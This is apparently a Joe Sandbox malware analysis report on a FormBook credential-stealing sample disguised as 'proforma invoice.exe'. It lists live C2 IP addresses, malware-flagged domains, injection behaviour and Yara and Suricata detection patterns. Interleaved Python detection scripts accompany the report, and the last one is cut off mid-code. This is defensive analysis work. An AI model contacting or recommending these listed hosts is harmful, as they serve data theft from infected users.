Windows Analysis Report
proforma invoice.exe

Overview

General Information

Sample name: proforma invoice.exe
Analysis ID: 1497807
MD5: 77f8da00f3632972d585ff7efb0bea8c
SHA1: 987ce549f5b8bb619bd78e5f88ae3cd132bb8f34
SHA256: aab17e4d4fcb75ffc655247c8f71df23d653b9b573d87eb2e32c589c543918f9
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found API chain indicative of sandbox detection
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • proforma invoice.exe (PID: 7568 cmdline: "C:\Users\user\Desktop\proforma invoice.exe" MD5: 77F8DA00F3632972D585FF7EFB0BEA8C)
    • svchost.exe (PID: 7584 cmdline: "C:\Users\user\Desktop\proforma invoice.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • NpiZrjTdIDFUidJcY.exe (PID: 5544 cmdline: "C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • clip.exe (PID: 7692 cmdline: "C:\Windows\SysWOW64\clip.exe" MD5: E40CB198EBCD20CD16739F670D4D7B74)
          • NpiZrjTdIDFUidJcY.exe (PID: 2412 cmdline: "C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 8032 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
No configs have been found
Yara matches in memory dumps (Source / Rule / Description / Author / Strings)

Source: 00000003.00000002.4103118117.0000000003040000.00000040.80000000.00040000.00000000.sdmp
  Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security
  Rule: Windows_Trojan_Formbook_1112e116 | Description: unknown | Author: unknown
    • 0x2a990:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13eff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Source: 00000001.00000002.1849019364.0000000000400000.00000040.80000000.00040000.00000000.sdmp
  Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security
  Rule: Windows_Trojan_Formbook_1112e116 | Description: unknown | Author: unknown
    • 0x2db53:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x170c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Source: 00000003.00000002.4103939789.0000000004CD0000.00000004.00000800.00020000.00000000.sdmp
  Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security
(9 entries in total)

Yara matches in unpacked PE files (Source / Rule / Description / Author / Strings)

Source: 1.2.svchost.exe.400000.0.unpack
  Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security
  Rule: Windows_Trojan_Formbook_1112e116 | Description: unknown | Author: unknown
    • 0x2cd53:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x162c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Source: 1.2.svchost.exe.400000.0.raw.unpack
  Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security
  Rule: Windows_Trojan_Formbook_1112e116 | Description: unknown | Author: unknown
    • 0x2db53:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x170c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
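The report prints two of the strings from the rule it calls Windows_Trojan_Formbook_1112e116 ($a2 and $a3, author not given) together with the offset of each hit in four dumps. The following is an added example, not part of the Joe Sandbox report and not the rule's own source: a plain-Python scanner for exactly those two byte patterns, so the check can be re-run on a dump without yara-python, plus a consistency check on the offsets the report lists. Only the two strings shown above are known from the page; the rule's remaining strings and its real condition are not, so the Yara text emitted by yara_rule() is a reconstruction with a condition of my choosing, and constructed_dump() is a synthetic buffer, not a real memory dump.

```python
"""Scanner for the two Formbook Yara strings shown in the report, plus an
offset-consistency check.  Added example; not the report's or the rule
author's code."""
import re

STRINGS = {  # hex patterns copied from the report's Yara string listing
    "$a2": "74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55",
    "$a3": "1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01",
}


def scan(buf: bytes) -> dict:
    """Offset list for every occurrence of each string in buf."""
    hits = {}
    for name, hx in STRINGS.items():
        pat = re.compile(re.escape(bytes.fromhex(hx)))
        hits[name] = [m.start() for m in pat.finditer(buf)]
    return hits


def yara_rule(name="Formbook_strings_from_report") -> str:
    """Yara source for the two strings.  The condition is an assumption:
    the real rule's condition is not on the page."""
    body = ["rule %s" % name, "{", "    strings:"]
    body += ["        %s = { %s }" % (n, hx) for n, hx in STRINGS.items()]
    body += ["    condition:", "        all of them", "}"]
    return "\n".join(body)


# ($a2 offset, $a3 offset) per dump, exactly as the report lists them.
REPORT_OFFSETS = {
    "process 3 dump at 0x03040000": (0x2A990, 0x13EFF),
    "process 1 dump at 0x00400000": (0x2DB53, 0x170C2),
    "1.2.svchost.exe.400000.0.unpack": (0x2CD53, 0x162C2),
    "1.2.svchost.exe.400000.0.raw.unpack": (0x2DB53, 0x170C2),
}


def a2_minus_a3(offsets: dict) -> set:
    """Distance between the two strings in each dump.  A single value across
    all dumps means every match sits in the same code, only at another base."""
    return {a2 - a3 for a2, a3 in offsets.values()}


def constructed_dump() -> bytes:
    """Synthetic buffer (constructed, not a real dump): zero filler with $a3
    at 0x100 and $a2 0x16A91 bytes later, the spacing the report shows."""
    buf = bytearray(0x100 + 0x16A91 + 0x40)
    a2 = bytes.fromhex(STRINGS["$a2"])
    a3 = bytes.fromhex(STRINGS["$a3"])
    buf[0x100:0x100 + len(a3)] = a3
    buf[0x100 + 0x16A91:0x100 + 0x16A91 + len(a2)] = a2
    return bytes(buf)


if __name__ == "__main__":
    print(yara_rule())
    print(scan(constructed_dump()))
    print("a2-a3 spacing:", {hex(d) for d in a2_minus_a3(REPORT_OFFSETS)})
```

Run against the report's numbers, a2_minus_a3() returns the single value 0x16A91 for all four dumps, which is what you expect when one unpacked payload is found at several bases. The two .unpack variants also differ by a constant 0xE00 in both offsets, so a scanner should report offsets relative to whatever image it is handed rather than expecting fixed values.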

            System Summary

Sigma rule matches

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\proforma invoice.exe", CommandLine: "C:\Users\user\Desktop\proforma invoice.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\proforma invoice.exe", ParentImage: C:\Users\user\Desktop\proforma invoice.exe, ParentProcessId: 7568, ParentProcessName: proforma invoice.exe, ProcessCommandLine: "C:\Users\user\Desktop\proforma invoice.exe", ProcessId: 7584, ProcessName: svchost.exe
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\proforma invoice.exe", CommandLine: "C:\Users\user\Desktop\proforma invoice.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\proforma invoice.exe", ParentImage: C:\Users\user\Desktop\proforma invoice.exe, ParentProcessId: 7568, ParentProcessName: proforma invoice.exe, ProcessCommandLine: "C:\Users\user\Desktop\proforma invoice.exe", ProcessId: 7584, ProcessName: svchost.exe
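The two Sigma events above and the classification tree both show the same thing: svchost.exe (PID 7584, loaded from SysWOW64) is created by proforma invoice.exe, and its command line is the parent's path rather than anything svchost would normally run with. The following is an added example, not from the report and not any vendor's Sigma rule, of the checks an endpoint detection would run over such process-creation events: an unexpected svchost parent, a command line that names a different binary than the image, and a Windows binary whose parent lives outside the Windows directory. The event records are constructed from the report's values (the third record is a benign control of my own); the allow-list of legitimate svchost parents is an assumption to tune per estate.

```python
"""Process-creation checks for the injection pattern in the report's
process tree.  Added example; not the report's or a rule author's code."""
import ntpath

# Assumption: parents that may legitimately start svchost.exe.
LEGIT_SVCHOST_PARENTS = {"services.exe", "msmpeng.exe", "mrt.exe", "rpcnet.exe", "ngen.exe"}
WINDOWS_DIR = "c:\\windows\\"


def first_token(cmdline: str) -> str:
    """Executable named by a Windows command line (quoted or bare)."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end] if end != -1 else s[1:]
    return s.split(None, 1)[0] if s else ""


def findings(event: dict) -> list:
    """Reasons this process-creation event looks like injection or spoofing."""
    image_path, parent_path = event["Image"], event["ParentImage"]
    image = ntpath.basename(image_path).lower()
    parent = ntpath.basename(parent_path).lower()
    out = []
    if image == "svchost.exe" and parent not in LEGIT_SVCHOST_PARENTS:
        out.append("uncommon svchost parent: %s" % parent_path)
    named = ntpath.basename(first_token(event["CommandLine"])).lower()
    if named and named != image:
        out.append("command line names %r but image is %r" % (named, image))
    # Low-confidence on its own (installers do this too); useful as a score.
    if image_path.lower().startswith(WINDOWS_DIR) and not parent_path.lower().startswith(WINDOWS_DIR):
        out.append("Windows binary started from outside the Windows directory by %s" % parent_path)
    return out


def scan(events: list) -> dict:
    """ProcessId -> findings, for events that produced at least one."""
    result = {}
    for e in events:
        f = findings(e)
        if f:
            result[e["ProcessId"]] = f
    return result


# Constructed records: the first two carry the values from the report's
# Sigma events and process tree, the third is a benign control (not from
# the report).
EVENTS = [
    {"ProcessId": 7584,
     "Image": r"C:\Windows\SysWOW64\svchost.exe",
     "CommandLine": r'"C:\Users\user\Desktop\proforma invoice.exe"',
     "ParentImage": r"C:\Users\user\Desktop\proforma invoice.exe"},
    {"ProcessId": 7692,
     "Image": r"C:\Windows\SysWOW64\clip.exe",
     "CommandLine": r'"C:\Windows\SysWOW64\clip.exe"',
     "ParentImage": r"C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe"},
    {"ProcessId": 4242,
     "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs -p",
     "ParentImage": r"C:\Windows\System32\services.exe"},
]

if __name__ == "__main__":
    for pid, reasons in scan(EVENTS).items():
        print(pid, "->", "; ".join(reasons))
```

PID 7584 trips all three checks; the clip.exe child (PID 7692) only trips the third, which is why the parent-location signal is worth keeping even though it is noisy by itself.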
Suricata IDS alerts (2024-08-23, times in UTC+02:00; every alert is severity 1, protocol TCP, destination port 80; sorted by source port)

SID 2855464 classtype: A Network Trojan was detected
SID 2050745 classtype: Malware Command and Control Activity Detected

Source port  SID      Timestamp
49736        2050745  04:18:27.482705
49737        2855464  04:18:43.216056
49738        2855464  04:18:45.757577
49739        2855464  04:18:48.408334
49740        2050745  04:18:51.068512
49742        2855464  04:19:13.014934
49743        2855464  04:19:15.545135
49744        2855464  04:19:18.178646
49745        2050745  04:19:22.189090
49746        2855464  04:19:36.939695
49747        2855464  04:19:39.479593
49748        2855464  04:19:42.073478
49749        2050745  04:19:44.582620
49750        2855464  04:19:50.401644
49751        2855464  04:19:52.981754
49752        2855464  04:19:55.506439
49753        2050745  04:19:58.472511
49754        2855464  04:20:05.444683
49755        2855464  04:20:08.147806
49756        2855464  04:20:10.695239
49757        2050745  04:20:33.106164
49758        2855464  04:20:39.664204
49759        2855464  04:20:41.281611
49760        2855464  04:20:43.986058
49761        2050745  04:20:46.356118
49762        2855464  04:20:52.510744
49763        2855464  04:20:54.962325
49764        2855464  04:20:57.530827
49765        2050745  04:21:00.064857
49766        2855464  04:21:05.837189
49767        2855464  04:21:08.372143
49768        2855464  04:21:10.944772
49769        2050745  04:21:13.440847
49770        2855464  04:21:28.069753
49771        2855464  04:21:30.603596
49772        2855464  04:21:33.147887
49773        2050745  04:17:48.756945


            AV Detection

Source: http://www.sandranoll.com/aroo/ | Avira URL Cloud: Label: malware
Source: http://www.gipsytroya.com/tf44/ | Avira URL Cloud: Label: malware
Source: http://www.xn--matfrmn-jxa4m.se/4hda/ | Avira URL Cloud: Label: malware
Source: www.sandranoll.com | Virustotal: Detection: 10%
Source: www.anuts.top | Virustotal: Detection: 7%
Source: www.gipsytroya.com | Virustotal: Detection: 8%
Source: http://www.gipsytroya.com/tf44/ | Virustotal: Detection: 7%
Source: proforma invoice.exe | ReversingLabs: Detection: 28%
Source: proforma invoice.exe | Virustotal: Detection: 29%
Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.4103118117.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1849019364.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4103939789.0000000004CD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1849710409.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4103994026.0000000004D10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.4104123201.0000000002480000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1849745711.00000000035A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: proforma invoice.exe | Joe Sandbox ML: detected
Source: proforma invoice.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb | source: NpiZrjTdIDFUidJcY.exe, 00000002.00000002.4103470681.000000000056E000.00000002.00000001.01000000.00000004.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4103116967.000000000056E000.00000002.00000001.01000000.00000004.sdmp
Source: Binary string: wntdll.pdbUGP | source: proforma invoice.exe, 00000000.00000003.1653485893.0000000003E70000.00000004.00001000.00020000.00000000.sdmp, proforma invoice.exe, 00000000.00000003.1652243415.0000000003FC0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1759986126.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1761687857.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1849352751.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1849352751.0000000003200000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000003.00000003.1851656992.0000000004D86000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000003.1849341364.0000000004BDA000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104167554.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104167554.00000000050CE000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: proforma invoice.exe, 00000000.00000003.1653485893.0000000003E70000.00000004.00001000.00020000.00000000.sdmp, proforma invoice.exe, 00000000.00000003.1652243415.0000000003FC0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1759986126.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1761687857.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1849352751.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1849352751.0000000003200000.00000040.00001000.00020000.00000000.sdmp, clip.exe, clip.exe, 00000003.00000003.1851656992.0000000004D86000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000003.1849341364.0000000004BDA000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104167554.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104167554.00000000050CE000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: clip.pdb | source: svchost.exe, 00000001.00000002.1849243613.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1817977068.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000002.00000003.1787838240.0000000000894000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdb | source: clip.exe, 00000003.00000002.4104507554.000000000555C000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4103317306.0000000003205000.00000004.00000020.00020000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000000.1920600296.0000000002BDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2142736899.000000002B35C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP | source: clip.exe, 00000003.00000002.4104507554.000000000555C000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4103317306.0000000003205000.00000004.00000020.00020000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000000.1920600296.0000000002BDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2142736899.000000002B35C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: clip.pdbGCTL | source: svchost.exe, 00000001.00000002.1849243613.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1817977068.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000002.00000003.1787838240.0000000000894000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\proforma invoice.exe | Code function: 0_2_00B0DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\proforma invoice.exe | Code function: 0_2_00B168EE FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\proforma invoice.exe | Code function: 0_2_00B1698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime
Source: C:\Users\user\Desktop\proforma invoice.exe | Code function: 0_2_00B0D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\proforma invoice.exe | Code function: 0_2_00B0D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\proforma invoice.exe | Code function: 0_2_00B19642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\proforma invoice.exe | Code function: 0_2_00B1979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\proforma invoice.exe | Code function: 0_2_00B19B2B FindFirstFileW,Sleep,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\proforma invoice.exe | Code function: 0_2_00B15C97 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_0305BC20 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_03049870: 4x nop then xor eax, eax
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_04DF053E: 4x nop then mov ebx, 00000004h

            Networking

Suricata alerts on the captured traffic, sorted by source port (all from 192.168.2.4, all to port 80):

Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49736 -> 5.44.111.162:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49737 -> 217.160.0.106:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49738 -> 217.160.0.106:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49739 -> 217.160.0.106:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49740 -> 217.160.0.106:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49742 -> 208.91.197.27:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49743 -> 208.91.197.27:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49744 -> 208.91.197.27:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49745 -> 208.91.197.27:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49746 -> 43.252.167.188:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49747 -> 43.252.167.188:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49748 -> 43.252.167.188:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49749 -> 43.252.167.188:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49750 -> 194.9.94.85:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49751 -> 194.9.94.85:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49752 -> 194.9.94.85:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49753 -> 194.9.94.85:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49754 -> 23.251.54.212:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49755 -> 23.251.54.212:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49756 -> 23.251.54.212:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49757 -> 23.251.54.212:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49758 -> 199.192.19.19:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49759 -> 199.192.19.19:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49760 -> 199.192.19.19:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49761 -> 199.192.19.19:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49762 -> 213.145.228.16:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49763 -> 213.145.228.16:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49764 -> 213.145.228.16:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49765 -> 213.145.228.16:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49766 -> 91.195.240.19:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49767 -> 91.195.240.19:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49768 -> 91.195.240.19:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49769 -> 91.195.240.19:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49770 -> 172.67.210.102:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49771 -> 172.67.210.102:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49772 -> 172.67.210.102:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49773 -> 172.67.210.102:80
Source: Joe Sandbox View | IP Address: 23.251.54.212
Source: Joe Sandbox View | IP Address: 213.145.228.16
Source: Joe Sandbox View | ASN Name: VPSQUANUS
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | ASN Name: DOMAINTECHNIKAT
Source: Joe Sandbox View | ASN Name: LOOPIASE
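The report spreads its Suricata data over two places: the alert table (timestamp, SID, source port) and the Networking lines above (SID, source port, destination IP). Joining the two on the ephemeral source port gives the C2 contact timeline and the IOC list an analyst actually wants. The following is an added example, not from the report or from Joe Sandbox, that does that join over a constructed subset of the report's own values; the regular expression is written for the message format shown above and nothing else.

```python
"""Join the report's Suricata alert table with its Networking lines to get a
C2 timeline and IOC list.  Added example; inputs are a constructed subset of
the report's values."""
import re
from collections import defaultdict

ALERT_RE = re.compile(
    r"(?P<sid>\d+) - Severity (?P<sev>\d) - (?P<msg>.+?) : "
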